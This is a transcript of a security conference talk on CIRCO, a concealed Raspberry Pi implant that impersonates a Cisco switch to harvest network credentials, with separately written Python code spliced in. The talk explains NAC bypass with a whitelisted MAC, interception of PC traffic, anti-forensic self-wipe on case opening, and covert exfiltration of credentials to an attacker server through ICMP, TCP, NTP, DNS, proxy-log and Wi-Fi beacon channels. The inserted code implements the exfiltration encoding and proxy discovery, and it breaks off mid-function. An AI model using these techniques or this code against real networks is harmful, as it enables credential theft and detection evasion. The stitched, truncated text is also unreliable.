So, soon to be a good afternoon to everyone, and now it is my absolute pleasure to introduce you to Emilio.

Thank you. Thank you. Let's see. Can you hear me? Good. All right. Good morning, good afternoon, good evening, depending on which time zone some of you are in. Let me start: today I'm going to present a tool called CIRCO, so let me first do some introductions. Hello, that's me. I come from Japan. I know that I don't look very Japanese yet, but I've been living there for ten years. You can call me either way, Emilio or Emilio, it works both ways. I like to play with networks, packets, and a bit of 3D printing as well. I already demoed a few tools at a couple of conferences, some of them in Japan, so you may be aware of them or not. Just keep in mind, I'm not a programmer. The code works, it's nice, and there's a lot of improvement to do, but it runs. As long as it runs, it's good to go.

All right, for those who are not familiar with the tool itself: the idea was actually born from automation. Within enterprise networks we have a lot of automation tools, and those tools discover every new device that connects to the network, connect to it, provision it, and do a lot of really cool stuff. Sure. But what if it's not a Cisco switch that you are connecting to? That basically gives us the credentials for free. Great, I thought that was a good idea. So what came out was a way to make something camouflaged, which is not going to be noticed, and put it there when you do red teaming, in meeting rooms, open spaces, the secretary's desk, those kinds of places. So I looked for a way to do this.

In this release, 1.5, what is new: in previous releases I was not able to keep an IP phone working, so I would go and unplug the IP phone and use that cable, but that's it, the IP phone would be off.
That's something people will notice, because it's not working anymore, and I wasn't very comfortable with it. A few people pointed it out as well, so in this version I managed to remove the phone but plug the phone back into the box itself, and it keeps working as if nothing happened. We're going to dig into that. I did some coding updates, and also some new exfiltration techniques, encryption for anti-forensics, self-destruct switches, integration with Faraday, and NAC bypass, basically. A lot of features between 1.4 and 1.5.

So who do we target? Well, pretty much any automation system out there. These are quite a few known systems; HPNA is very popular, of course, NetMRI as well. NAC itself is not an automation system for network provisioning, but what it does is try to prevent the things I'm trying to do, basically. So I will get rid of NAC as well. And of course there's always some admin connecting to things and putting passwords everywhere. This is an example of things that happen with a Raspberry Pi: some device in the network that nobody noticed had been exfiltrating data at the NSA. This is not uncommon, because NAC is very hard and doesn't solve all our problems. So it did happen.

Okay, so what are my main issues for version 1.5? Power options: I'm going to put in a Raspberry Pi, which needs power; okay, battery, PoE. Plugging it in for power looks suspicious. Someone told me, but if you find this enclosure and you open it, you can see the keys and where the box is exfiltrating data, because it's just an SD card and Linux. Yes, so I needed to add some anti-forensics to it, encryption basically, where the key is always a problem.

All right, so let's start with the first problem, the power. I came out with the paper idea, the easiest one: you just start to draw things and come up with a list of wishes of what you want to do.
The concept was: okay, the PoE negotiation is very complicated, it has many standards and many different ways to do it, and many implementations differ. But there's one element: the phone and the switch will do the negotiation of the power, how much power you need, how many watts, et cetera. I didn't want to get into that. So I said, okay, let the phone negotiate, and once that's done, I just hook the power. So I came up with an idea that violates pretty much every principle in networking. Okay, why not, let's give it a try.

Once you have a paper idea, what you tend to do is breadboarding: let's go, come on, plug some cables and see what happens; something will blow up for sure. So you start to build up some ports and, yeah, this breaks all network industry standards, by the way, so trust me on that one. What tends to happen when you start to do this is that at some point, without you noticing, it actually works. And I'm like, okay, this is actually a good thing. So now you elaborate on it, and you move into prototyping. This is a little board, because the jumpers keep coming out of the breadboard, so I said, okay, let's make it a bit more stable. I did a prototype to see; basically it's four RJ45 jacks and a DC-to-DC converter plus a USB socket. It was a very simple idea; it's all the wiring that goes underneath. Again, I have never designed a PCB, so it would be nice to have it like a Raspberry Pi HAT, maybe, or go into that. I'm still trying to figure it out, so prototyping is okay.

All right, how Circo evolved between different releases. Circo is around one year old, maybe, from around October 2018. It started like an idea in a box. When I say in a box, I mean literally in a cardboard box. It was good because you can see the components, and you can say, ah, this is the..., you can even put labels on it, so it was fun.
What happened here is that I used to use PoE LAN modules; I bought one with DC output, so basically what it does is the PoE negotiation and then gives you the LAN back and the power. I bought one at 12 volts; okay, I need to convert this to 5 volts, and then I figured out they sell 5-volt ones. So this was the first release, right? Then we evolved into production. We said, okay, let's move on, so I got some enclosures; they look like those boxes that you have under your desk or on your desk. The whole concept is, okay, let's work with what we have in the market. So I looked for these enclosures to put the stuff in. In this release, you see there's only one cable going in? That's because I unplugged the phone, and that's it. And also the smaller version, which was a bit more tricky because there's less space: you can use a Raspberry Pi Zero, which is cool, but you really need to work with the space. Again, this version has only one LAN, so you need to work with LAN adapters on the Raspberry Pi.

All right, so we moved to this version, which has this box. This box, remember, now I'm still on the phone and I'm going to plug the phone back in here. So what I'm going to do is use two different LAN adapters on the Raspberry Pi. That's the reason I have a USB LAN adapter plus the onboard one. As well, on the bottom, you will see a DC-DC converter, from the 48 volts of PoE back to 5 volts to power the Raspberry Pi. And the yellow thing that you may see there is a magnet switch. You see where I 3D-printed some handles to mount it, but it's basically a magnet and a tilt, a magnet switch. What it does, and that is the key, is that when you open the case, it will detect that you opened it and you can rm -rf, you can do whatever you want, reboot, shut down.
This is to prevent forensics, in case some forensic examiner goes and doesn't unplug the cables and just opens the suspicious case they found: it will blow up, basically, if you want it to. That was a bit dangerous to do, EPMs, heat-ups, fire hazards, so just be careful. Of course, the same thing goes into the smaller box as well; here what I needed to do is use USB LAN adapters and a hub. So it gets tricky, but it still fits. Depending on what you find in the market as a disguise box, you can play around.

So how much does this cost? Because this must be a really expensive thing. Well, this is an example of how much this box costs. To give you an idea, this is a Raspberry Pi Zero, the two USB LAN adapters and the micro USB hub are ridiculously small, and the outlet is one of the most expensive things; the outlet I think is $10 or something. So yeah, you can get this for $50. So if you don't want to go and pick it up: you do a pen test, you leave it there, and you are welcome to go and pick it up, or not, depending on how well things finish in the pen-testing report, right? So, you know, just in case you want to lose it.

All right, so the hardware is one thing; it's very simple components: LAN adapters, Raspberry Pi, plastic box, and a DC-DC buck converter. Now the question is what we are using as software. Well, Circo is actually the little box, but we also have a few components. We have a component called CARPA, which is a software-only component running on the internet, in a VPS, Python on Linux, so very simple components. That's software only. Why? Because once this box has infiltrated the network, what is it going to do? Well, it's going to become a Cisco switch to get discovered. So all these lovely automation systems will connect to me and give me the credentials. So essentially it's a honeypot, basically. But what happens once I have the credentials? SNMP, telnet, SSH, whatever the user sent to me.
Great, now I need to exfiltrate to the internet. This is the tricky part, because I need something on the internet to receive it. That is where CARPA comes into play. At the moment I have a demo here, which I run on a Raspberry Pi with Linux. You can run it on any VPS on the internet; Amazon or any VPS server will do. The only requirement is that you have a domain name with NS records pointing to the public IP of your VPS, or NATed, if you have it NATed. Then we have one more component, which is Haula. Haula is, again, a software component. You can run it on a Raspberry Pi with a power bank and a wireless adapter. What it does is basically let you also exfiltrate via wireless. So it will exfiltrate from the box itself to the internet, or via wireless, or both if you want. With wireless, of course, you need to be in proximity. Keep in mind, we are not setting up any access point. This is not an access point, because that would be caught by a WIPS. We don't want any WIPS to notice us.

Currently it's in Python 2, coming to 3 soon, and all the packet manipulation is mainly based on Scapy, in Python. We are also using some other tools from a different combination of people. For example, for OSfooler, some part of the code of OSfooler to fool NAT, effectively speaking. And what exfiltration can we use? We have ping, traceroute, NTP, HTTP, HTTPS, DNS, proxy, and wireless. All of these are atomic: basically nothing ever comes back. From the firewall's point of view, it's a session that times out. So there is never a session in any of the protocols I just mentioned, or an established connection, or anything coming back. Basically CARPA never sends anything back to me.

Another new feature that came out is just because I have a phone, right, and the phone keeps working: I'm basically a man in the middle between the phone and the network.
However, in most offices people connect the phone to the network and the PC to the phone. That automatically gives me free traffic from the PC as well. So that was a free bug, kind of. Effectively, you can run different tools to capture telnet, SSH, FTP or other unencrypted protocols, or hashes, and exfiltrate them as well. So not just the network part, but also the PC, if any is connected to it.

So how do I become a Cisco switch? Well, I need to be able to send CDP and LLDP. I need to have an SNMP server, an agent basically, running, and telnet and SSH, and all my packets need to look like a Cisco switch. Those were the three pieces, basically, of how it came out.

For flows, I have single mode, which is what you used when you didn't connect the phone back, and bridge mode, which is the most interesting for this talk. In bridge mode, this is how the logic works. Once you turn this box on, what it does first is discovery, to see what the real switch close to me is, and it tries to get the name. Once it gets the name, it will try to get one similar to it. So if this switch, for example, is switch Tokyo 01, it will become 03; it changes the last digit by 2. The logic is very simple. If not, it always falls back to test01. We need to pretend to be a nice brand-new Cisco switch in the network. So we want to get that information first, then we get an IP address, and we start to set it up. Of course the MAC address is that of a Cisco switch; we change the MAC address at the beginning. As well, one thing we want to do is start to advertise CDP and LLDP to the switch. That's the way we get discovered by the automation tool. What tends to happen is the existing production switch is already hooked to the automation tool, and when it sees a new CDP and LLDP neighbour, that gets discovered on the system. On the system, once a day, they connect and try to pull the config, et cetera. Basically it gives us the credentials.
Once this happens, once we get the credentials, we can set how often we want to exfiltrate. It will cycle, if we want to just do it once or do it every hour. Same for exfiltration, and which method you want, or all of them.

To do this demo, I actually need to build a network with a proper switch and a firewall and a router and DHCP and the internet. I used to have all this spread across the desk. It was very difficult to set up; you always forget one cable and things don't work. So because in Japan we have Toyota that makes cars, right? I came out with Macaroni. This is our infrastructure in a box, basically, in a briefcase, and it only costs $200. It doesn't cost $20,000 like a Toyota. But what it does is simplify things very much. And the lab itself, I know everything has an acronym, right? The lab itself looks like this. It's basically, you can look it up afterwards if you want, a proper Cisco switch, and CARPA is simulated with a Raspberry Pi. I also hooked up a Snort on the outside, on the internet, to see what the Snort will see. This Snort is configured as it comes; there isn't any tuning in the middle. So it's default, basically, all of it. It's supposed to catch even rubbish traffic as well.

So what I'm going to do is explain how the exfiltration technique works. For exfiltration, I need to be able to tell my device on the internet which credentials these are and where they were taken from. So, whether it came from my telnet daemon, my SSH daemon, through SNMP, or even the PC that was hooked up, as an optional thing I'm working on. Also, I want to know if this is the enable password of the switch, or the username and password of the switch, or the SNMP community, basically. This is where we use SNMP v1 and v2 as well. v3 not yet; nobody actually uses it in any network that I'm aware of. So this is the format, plus the source IP of the automation tool or the administrator's laptop, whoever connects to my box.
Right, guys, this is specifically the format that we want to exfiltrate. One way to exfiltrate this data is, first of all, we encrypt it with AES-256. So let me first go into show time. Let's start with the demo. Let me see if you can see; let me close this. So yeah. I cannot see, though. I cannot see what I'm typing. Let me bring it back, kind of mirror it. I don't know how to do this. Does it look better now? Look okay? Yeah? Right.

So this is my server on the internet. When I run it, this gives me the options of the server. This is my Snort, this is my administrator PC, and what I need now is my box. I also have this, because this version integrates with Faraday. So let me log in. In Faraday I have one workspace and I have hosts; I only have one host with some vulnerabilities. All right. So let me do the magic. I need to put a magnet on because I opened the lid. So I need to, you know, hack the lid open, type of thing. What you do is you take the phone out. This is my LAN from the switch, and an extra cable from the phone. And there's a lot of flashing lights here; that is just another Raspberry Pi. Nothing more interesting than that.

One thing I did find out was how to prevent forensics. I'm going to use LUKS to encrypt the partition where I have the software, in case someone finds it. The problem with encryption is that to decrypt you need a key. So what happens when you want to do that in a box that is closed? You go there and put it in; you don't have a laptop and an installation system to spare, or a keyboard to plug into the Raspberry Pi or whatever. So what I came up with is that I need a long key that I can use quickly to mount and decrypt this Raspberry Pi. I found that this Raspberry Pi has Bluetooth. Great. There are a million applications; there's a Bluetooth application where you can create services. You can do it from Linux as well.
What I'm doing is I create a service called Circo and it has a UUID, which is 128 bits. So guess what? That's my key. What this guy is doing, once it boots up, at the moment it's in demo mode. In the meantime I should be able to access it. If I do df, the home drive I want is called "P and keep". If I do that, there's nothing, because it's not mounted, right? So what I'm going to do is turn on this Bluetooth service. It's a demo key, in case you are sniffing Bluetooth. It's not for production use, right? Once I turn it on, it runs every five seconds, I think I put, or ten seconds. What it does basically is scan to see if it finds the service, and use that key to mount and decrypt LUKS. Ideally this is all automatic. Let me see. I think it's every ten seconds. Ten seconds. Ten seconds. I can't remember what I put. So I created the service. It uses the system LUKS. Yeah, I created a little script basically to do that. Let me see. This is on. Or maybe I have Bluetooth off. I will explain. There you go. Now it's jamming Bluetooth, right? This is what happens with live demos. Come on. It did work before. Yes. Let me stop and start. And let me do start. I think it's my phone, actually. All right. Let's see. Let me do this manually. Oh, it did work. Oh, it was already mounted. Yeah. Well, playing with Bluetooth within DEF CON is sometimes not a good idea. So let me turn this off again. All right. It's already mounted. So let me go to... This normally will start automatically. But... So... Oops.

So just to give you the menu. I've got CARPA, which is the one on the internet, to receive the credentials, which I'm going to start in verbose mode. The plugin is the Faraday plugin. The interface is zero. And just a file where you want to put the output, the credentials you find. And this is the Circo interface. So what do you do? First of all, we go into bridge mode. Well, I put it in verbose.
We go into bridge mode because it's the one using the phone and the LAN at the same time. You still have backward compatibility, because that's a good way to do things. Then we can choose which exfiltration technique we want. You can actually see them all, or let's... you can do ping, DNS, HTTP web, NTP, proxy. I don't know. I couldn't put in a -a option, actually. So when you start it, let me see. This one already started and logged into Faraday. Okay. The Faraday plugin, what it does basically is every credential it gets, it injects into Faraday directly. When Circo starts in verbose mode, that's the reason you see all the steps of what it's doing. So it starts becoming a Cisco MAC address switch. This is to bypass NAC. The MAC address I'm using is a golden one. If you read through the NAC manual, it's in there; it's a very small section. If you use this MAC address, you'll always be allowed. Just read the document. It should be fine, right? Guess what? That's what I'm using. Great. Thank you for the manual.

So becoming... Can you read it, right? Yes? Do you know why we can't make it bigger? That's too big? Better? Yeah? So what it does is it becomes a MAC address switch, discovers, starts DHCP, configures the interface. So this is all the configuration of the proxies. For the proxy, I have three different techniques; we'll go into details. This one is using DHCP. And from here onwards, it starts a honeypot. Right? The last line you see is because of the magnet I put there. The lid is open, but I put the magnet on manually. If I take that magnet out, things will go crazy.

Now, I'm going to go to the real switch. This is my real switch, Tokyo01. If I do show cdp neighbors, guess what? I see a phone. And I also see a switch called 03. It's a 2960. You can choose details. And this is... Yeah? It has an IP address. This is the version. The port. The Cisco switch.
So I can see show cdp and show lldp. As well, I can see LLDP. So this switch believes someone connected a new switch, maybe in a meeting room for training or something. It does have an IP address, which is .151. All right? So this is my admin PC. What happens if I telnet to that IP address? I get the same prompt. Okay? So I type my super user, and switch number three. Now what I believe is a switch. I can run commands, Cisco commands. show version. Yeah? It's a 2960. This is the version running. show ip route. show ip arp. show mac address-table. show interface description. It is a Cisco switch, what I believe in. show cdp neighbors. I need to type it correctly. Of course, it's a Cisco switch. Yeah, I can now see Cisco switch one, the production one. So they see each other, in theory. Same with show lldp neighbors. Yeah? I can see it. So from this switch, when automation systems connect to it, by telnet or SSH, with the master credentials, they will run a set of commands to get the configuration, inventory, et cetera. Those are most of the commands that are supported. I did not code the whole IOS simulator just for fun. It wasn't fun. Yeah? The question mark also works, by the way. Yeah? Oh, and if you want to do show run, of course, you need to be in enable mode. Okay? Go enable. Yes, sure. Great. Secret. Now I can do show run. Yeah, that works. What I can do is conf t. No, that doesn't work. I set the command syntax errors, because I'm not going to write a whole IOS, basically, right? So that was the time that I had, right? So you can see in the configuration that the community is public. There's an SNMP community. Now, what tends to happen is, the automation system will first try their own SNMP community. And if it fails, it will try public, you know, one of the list of the common ones. So let's say I try the system community, the one that they use in the company, right? When I try that, that will not work.
A, because it's public, the one that works. But you already gave me the community with that command. When you do public, it has to reply like a Cisco switch. It is actually the name, the uptime, the version. It is a full SNMP device that you can poll. Now, what happened when I went back to CARPA? Well, I started to receive this data. This is because it's verbose. So basically, it tells me that something came via ping, from this public IP, telnet, user netadmin, password verysmart, from this source IP they connected from, which is the internal IP of this administrator laptop or automation system. And then I get the same password via ping, DNS, traceroute (DNS is the proxy one, by the way), HTTP, NTP. And then I also get this via here. So, whoops. Someone connected via telnet, enable, the E just stands for enable, with this super secret password.

So again, if I now do the same thing, let me open the... This is what the IPS is looking for; ignore the unreachables, because I don't have an internet connection, of course. The only traffic that this guy can see, because I enabled the defaults, is a ping. So a Cisco switch is sending a ping packet. Nothing comes back, but that's the only alarm, and I don't know anyone that has Snort with ICMP ping configured for alarms. That would produce a lot of alarms. That's the only thing you can see on the Snort side. So again, when you see a ping, and the community: my switch did not reply to the community, but you did give it to me. It replied to public, but not to the community you gave me, but I exfiltrated it.

Now, if I go to Faraday, right? When I do a refresh on hosts, now I have a new extra host. This 10.10.10.88 is the source IP of the automation tool or administrator, and where it is connecting from. If I go to the credentials, I can see the target, I can see the protocol: this one is the telnet enable and the password; this is the telnet username and password; and this is SNMP.
I should put SNMP instead of P. So now, as soon as I get them in CARPA, via an API, I can inject them into Faraday in real time. That's to help with the pen-testing report side.

Now what happens if I actually remove the magnet? You know? You start to see this alarm: open, alarm open. That means that, because I did not unplug it, right, I removed the magnet. So what it does, when it detects that someone opened the case and the magnet switch opened, is send a magic packet via exfiltration saying that someone opened it. So, you know, maybe it's time to write the report. Of course, you can make it do things; if you go here, for example, this was Circo running in debug mode, right? You see that it's sending the credentials. And here is when I took the magnet off, right? You can do this, for example. That command, what it does is immediately reboot. Remember, because we have the Bluetooth encryption, unless I'm back close to this box with this thing enabled, that will not work if it reboots. So if someone unplugs and replugs it, it will not mount the encrypted partition. That is a balance between having encryption and functionality. If you want encryption, you want the Bluetooth, sure. But if someone by mistake unplugs and replugs it, it will not work again. You need to be back walking around with the mobile in your pocket, right? So, yeah, you can do whatever you want. You can, you know, eat BGM pools, I don't know, start fires, whatever you like there. So this is the way this stuff works. These are the components.

So let me go deep into the exfiltration. Something's in the middle, right? Excuse me. There you go. Go away. All right. So how do I do it... This is basically a nice honeypot. How do I take the data out? That is the interesting point. This is going back to basics. We are using protocols that go through firewalls. Some of them are blocked by companies; some of them can go through.
For example, some companies do allow ping to go out for troubleshooting, or traceroute. These are the protocols I'm using. For ICMP, I'm using specific TCP, IP and UDP packet fields to actually put my data in. Remember, I have one line, say T, comma, username, comma, password, comma, and IP address. What I do is encrypt it with AES-256, and then chunk it into two bytes or six bytes. The way the encryption works, basically, to decrypt it you need to tell me how many packets I should expect, how long my crypto should be. So I'm going to send you 13 bytes of crypto in seven packets, two bytes each. First of all, I need to be able to tell you that in advance, before sending the packets. So what I'm doing is sending one packet. In the IP header there's a field called identification. That does not get changed by NAT; when you NAT through a firewall, that doesn't get changed. So okay, that's two bytes that I can use for something. ICMP packets: within the ICMP packet, you also have identification and sequence numbers. Again, two and two bytes that I can use for something.

So ICMP, how it works. Basically, I need to tell you: my 13 bytes in seven packets. I would send one packet with 213 as the IP ID, right, and the rest is just random. That means the receiver knows that it's expecting 13 bytes. Then I'm going to send you 307 as the IP ID. 300 means that you're expecting seven packets. And then I will send you the seven packets, with 501, 502 and so on as the sequence ID. That is the sequence of the packets, in case they arrive in a different order. And the crypto goes within the ICMP sequence, which is two bytes; I get that converted to an integer and that will be my crypto. So I need seven packets to do 13 bytes, plus padding, right? One byte of padding. This is the way most of the exfiltration techniques work. It's basically chunking data into specific fields within different protocols.
Ping is one example; traceroute is another. For traceroute, we are using the data payload. For a Cisco switch, the last four bytes are rubbish. So we are using those four bytes with hex. My encrypted data becomes hex; I encode it into hex, which looks like a hex string. So that's a good place to put four bytes. Again, similar concept: first I need to tell you I'm sending 30 bytes in seven packets, and then I send them one by one.

Now, if we move to HTTP or HTTPS, remember, I'm not making a session. I'm merely sending the SYN packet, that's it. There's something called window size in TCP, and it does not change between the client and the server through NAT. So you have NAT and that thing doesn't change. Great. So I have two bytes I can use that do not change between an internal client and an internet server. That's what I'm using. Similar concept: I'm sending 213, like we saw in ICMP, but I'm putting the crypto within the window size of the TCP packet. So yeah, port 80, 443, or any port you like, 25 if you want. But remember, most of this stuff probably doesn't have direct access to the internet, so those exfiltration methods may not work. HTTP, HTTPS, actually any TCP port will be the same concept. You just send the SYN, nothing comes back, and the crypto goes in the window size. Of course, it becomes an integer, right? It's just supposed to be a number. And the whole process is reversed on the other side. In CARPA, it's the other side receiving; it's the whole thing the other way around.

NTP, NTP was a bit of fun. There's something called the transmit timestamp, great. The transmit timestamp has this format: it's basically a timestamp plus a fraction. The timestamp is 32 bits and the fraction is 32 bits. Wait a minute, that's a lot of data I can put in 32 bits, I said. So I'm using the fraction.
Basically the way that works is I'm playing with the stratum and poll to tell you, again, my crypto is 13 bytes and I will send 7 packets or 6 packets or whatever, with the padding that I need. In this case, I can send 4 bytes. So in reality, I don't need 7 packets for 13 bytes; maybe 4 packets will do. So I need to delineate 4 packets for this protocol specifically. Then I put it in the fraction, converted into an integer, or actually a float, because it's 32 bits. And then the process is the other way round. So inside the NTP query, I'm putting it in the fraction of the transmit timestamp, 32 bits of it.

The DNS packet, this one is easy. It just uses a subdomain: encrypted.mydomain.com. But I'm not sending a query to the internet. I'm sending an NS query to the internal DNS of the company. So this attack is not direct; I don't have access to go outside. But the DNS server has internet resolution, through a relay or directly, maybe. What tends to happen when you do an NS query is that it will recurse until it gets it, assuming your DNS actually has internet resolution. Again, this is the encrypted hash, the 30 bytes we talked about, so it's not a very long string. You send it in one query; here you don't need multiple. So in this case the flow is: you send just to the internal DNS server and the DNS server goes directly to the... The trick here is that the NS server should be CARPA, the public IP address, of course, of that evil domain you're using.

Now, what happens when the company doesn't have DNS resolution either? You know, no access to the internet in any protocol, no external DNS resolution. All right, proxy. They might have something. So proxy works in the way you discover the proxy, the way you set up the proxy on PCs. So what do I do: DHCP option 252, WPAD, or GPO. Those are the three most common.
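To make the field-stuffing scheme from the ICMP, TCP and NTP explanations concrete, here is an added worked example; it is not code from the CIRCO project and was written for this page. It implements the announcement convention the speaker describes (IP ID 200 + byte count, then 300 + packet count, then 500 + index per data packet) and carries each chunk in a field of the protocol's width (16-bit ICMP sequence, 16-bit TCP window, 32-bit NTP timestamp fraction), plus the DNS subdomain carrier. Assumptions not stated in the talk: the ciphertext is a constructed byte string standing in for the AES-256 output, padding is zero bytes, the three IP-ID ranges are kept disjoint by a length guard, and the DNS labels are hex-encoded. Packet construction (Scapy) is omitted; the functions return the field values a sender would place and the receiver would read.

```python
import random

# Carrier field width in bytes for each protocol named in the talk. These are
# the real header field sizes: ICMP sequence 16 bits, TCP window 16 bits,
# NTP transmit-timestamp fraction 32 bits.
CARRIER_WIDTH = {"icmp_seq": 2, "tcp_window": 2, "ntp_fraction": 4}

# Announcement scheme from the talk, carried in the IP identification field:
# 200 + ciphertext length, 300 + number of data packets, 500 + chunk index.
LEN_BASE, COUNT_BASE, SEQ_BASE = 200, 300, 500
IP_ID_MAX = 0xFFFF  # IP identification is a 16-bit field


def encode(ciphertext, carrier):
    """Sender side: return (ip_id, carrier_value) pairs, one per packet."""
    width = CARRIER_WIDTH[carrier]
    # Assumption: keep the three IP-ID ranges disjoint. The talk's records are
    # ~30 bytes, far below this; a real sender would split or reject larger input.
    if len(ciphertext) >= COUNT_BASE - LEN_BASE:
        raise ValueError("record too long for the IP-ID announcement scheme")
    pad = -len(ciphertext) % width            # 13 bytes at width 2 -> 1 byte of padding
    padded = ciphertext + b"\x00" * pad       # assumption: zero-byte padding
    chunks = [padded[i:i + width] for i in range(0, len(padded), width)]
    if len(chunks) >= SEQ_BASE - COUNT_BASE:
        raise ValueError("too many packets for the IP-ID announcement scheme")
    field_max = (1 << (8 * width)) - 1
    packets = [
        (LEN_BASE + len(ciphertext), random.randint(0, field_max)),  # e.g. 213, filler
        (COUNT_BASE + len(chunks), random.randint(0, field_max)),    # e.g. 307, filler
    ]
    for index, chunk in enumerate(chunks, start=1):                  # 501, 502, ...
        packets.append((SEQ_BASE + index, int.from_bytes(chunk, "big")))
    return packets


def decode(packets, carrier):
    """Receiver side (CARPA's role): reassemble from packets in any order,
    ignoring unrelated traffic and refusing an incomplete transmission."""
    width = CARRIER_WIDTH[carrier]
    length = count = None
    chunks = {}
    for ip_id, value in packets:
        if LEN_BASE <= ip_id < COUNT_BASE:
            length = ip_id - LEN_BASE
        elif COUNT_BASE <= ip_id < SEQ_BASE:
            count = ip_id - COUNT_BASE
        elif SEQ_BASE < ip_id <= IP_ID_MAX:
            chunks[ip_id - SEQ_BASE] = value.to_bytes(width, "big")
        # any other IP ID is unrelated traffic and is skipped
    if length is None or count is None or sorted(chunks) != list(range(1, count + 1)):
        raise ValueError("incomplete transmission: missing announcement or chunk")
    return b"".join(chunks[i] for i in range(1, count + 1))[:length]  # strip padding


def dns_name(ciphertext, domain):
    """DNS carrier: the ciphertext as subdomain labels under the attacker's zone.
    Hex encoding is an assumption; the talk only says the subdomain is the crypto."""
    hexed = ciphertext.hex()
    labels = [hexed[i:i + 63] for i in range(0, len(hexed), 63)]  # 63-char label limit
    return ".".join(labels + [domain])


def demo():
    """Round-trip a constructed 13-byte stand-in ciphertext over each carrier."""
    ciphertext = bytes(range(1, 14))          # constructed; encryption omitted here
    results = {}
    for carrier in CARRIER_WIDTH:
        packets = encode(ciphertext, carrier)
        random.shuffle(packets)               # the network may reorder packets
        results[carrier] = (len(packets), decode(packets, carrier))
    results["dns"] = dns_name(ciphertext, "mydomain.com")  # assumed domain
    return ciphertext, results


if __name__ == "__main__":
    original, out = demo()
    for name, res in out.items():
        print(name, res)
```

With the talk's 13-byte record, the 2-byte carriers need seven data packets (nine in total with the two announcements) and the 4-byte NTP fraction needs four; the receiver only accepts a record once every announced chunk has arrived, which is what the count announcement is for.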
Okay, so what I do for DHCP: I will send a DHCP INFORM to the DHCP server to see if that option 252 is there and get the PAC file. What you get is actually a PAC file server, right? Get the PAC file, parse it to get the proxy IP and port, then connect to the proxy, right? And of course, all proxies are most likely authenticated. Doesn't matter. This doesn't need to authenticate to a proxy to work. So, this is a bit tricky, because this unfortunately works with all the Blue Coats, McAfees, all the high-end proxies. Because they forgot about something. When I do a telnet, a simple telnet to a proxy, and I do a GET http://mycrypto.mydomain, and of course I hit enter, I get a 403, right? From the proxy. However, the proxy will generate the log in the system saying this IP address tried to go to this URL and got a 403. But a proxy does one more thing: it does a lookup of that URL to put the IP in the log, which does not appear. But what that means is that it, which has DNS resolution, is now querying my DNS server with the string that I want to send. So it's... Okay, thank you. That will do. So, yes, it does generate one 403 entry in the proxy logs. You know how many of those you get in a proxy constantly? Millions. So, yeah, great. That works if we have DHCP option 252.

Okay, sometimes you have WPAD, if you still have WPAD. Similar concept: I just look for the WPAD DNS entry, connect to the PAC file, get the proxy, and do it all over again. But again, no DHCP, no WPAD, so most likely GPO. So the last thing I can do is DNS guessing. Basically, you give an array of names, like keywords: internet, or gateway, or GW, or PRX, or proxy, or gateway, something. So you do that list of 10, 15 words, and I will generate a dictionary with a dash, with an underscore, backwards and forwards. A matrix, and I will generate a list of, let's say, maybe 280. And then I will try with the internal DNS which one actually replies back to me.
Then I will test if this is a proxy PAC file server. So I will try to connect and try to get a PAC file. Could be something else. If it doesn't work, I will keep trying until I see something. So this is the way to go around the GPO, because in GPO you need to have access to a Windows box to actually see it. It's per profile, basically. So you can't really sniff it out of the network.

And the last thing is the wireless. For wireless exfiltration, remember I said I'm not setting up a wireless access point. I'm using beacons. Very short beacons, of 500 milliseconds. So what I'm doing is, within the beacons, I'm using the SSID names of the wireless at home in many places. Normally it tends to look like a MAC address: the last six digits of the MAC address of that home router are in the name of the wireless SSID. So I'm taking the opportunity to mirror that and broadcasting, instead of the MAC address, part of my crypto. So again, I have 13 bytes. I will chop it in three. I will have six, six and one, with padding. And then broadcast for 500 milliseconds the SSID of each of the three. And the receiver will be looking for who is... it's like a phone broadcasting SSIDs for a very short period of time. So that's the reason WIPS will not see it. Basically I'm using beacons as a back channel to push data out, for credentials. And that's it. And now I have questions. Oh no.

Can you defeat MACsec? The thing is, when you connect to the switch, right, what you have is actually a phone connected to the switch. So most NAC systems, if you like, you want to have a network with one MAC address allowed only. Well, most companies have a phone. The phone tends to have a PC after it. So you need at least two, minimum, right? So because you are putting in a Cisco switch, and the MAC address that I'm using is actually a golden MAC, NAC cannot block that one. Because the trick is very simple: there's a MAC address for virtual services like HSRP or VRRP.
Cisco HSRP is a router standby protocol, right? So what it does is they have virtual MAC addresses that they create. Those virtual MAC addresses are whitelisted by default in all NACs, based on the documentation. I did not write it. So are you using one of those? Any other question? Yeah? This one? Oh, sorry. Yeah, I will release the version after DEF CON. No time over DEF CON. It's procrastination. But I will push it out to GitHub to have the newest version and the guide for the build. Building is quite straightforward too. It doesn't require a lot of electronics to do that. It's just a Raspberry Pi and a few things. And the presentation, I believe the slides will be up soon. We'll put them on the website as well. There's a website somewhere. There are stickers in the back, if someone wants stickers. If not, let me know. I still have some stickers. If no more questions, thank you very much for listening.
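The proxy-discovery and proxy-log exfiltration steps from the talk (DHCP option 252 or WPAD or hostname guessing, then fetch and parse the PAC file, then a GET with the ciphertext as a subdomain), as an added example that is not CIRCO's own code. The keyword list, suffixes and PAC file are constructed; the DHCP INFORM exchange and the HTTP fetch of the PAC file are left to the caller because they need a live network. The 63-character DNS label limit is why a 30-byte ciphertext (60 hex characters) fits in one query.

```python
"""Added example: PAC-based proxy discovery and the proxy-log DNS trick.
All inputs are constructed; nothing here touches the network."""
import itertools
import re

# Constructed keyword list; the talk suggests 10-15 words of this kind.
KEYWORDS = ["proxy", "prx", "gw", "gateway", "internet", "wpad"]
SEPARATORS = ["", "-", "_"]
SUFFIXES = ["01", "1", "srv"]  # assumption: common qualifiers glued before/after a keyword


def candidate_hostnames(keywords=KEYWORDS, separators=SEPARATORS, suffixes=SUFFIXES):
    """Keyword alone, keyword<sep>suffix and suffix<sep>keyword: the 'dash, underscore,
    backwards and forwards' matrix to resolve one by one against the internal DNS."""
    names = set(keywords)
    for kw, sep, suf in itertools.product(keywords, separators, suffixes):
        names.add(f"{kw}{sep}{suf}")
        names.add(f"{suf}{sep}{kw}")
    return sorted(names)


def pac_urls(domain, dhcp_option_252=None):
    """Where to fetch a PAC file from: the option 252 URL if the DHCP INFORM returned one,
    then the WPAD well-known name."""
    urls = [dhcp_option_252] if dhcp_option_252 else []
    urls.append(f"http://wpad.{domain}/wpad.dat")
    return urls


# 'PROXY host:port' or 'HTTPS host:port' entries inside a FindProxyForURL return string
PROXY_RE = re.compile(r"\b(?:PROXY|HTTPS)\s+([A-Za-z0-9.\-]+):(\d{1,5})", re.IGNORECASE)


def proxies_from_pac(pac_text):
    """Unique (host, port) pairs in order of appearance; DIRECT entries are ignored."""
    seen, found = set(), []
    for host, port in PROXY_RE.findall(pac_text):
        entry = (host, int(port))
        if 0 < entry[1] < 65536 and entry not in seen:
            seen.add(entry)
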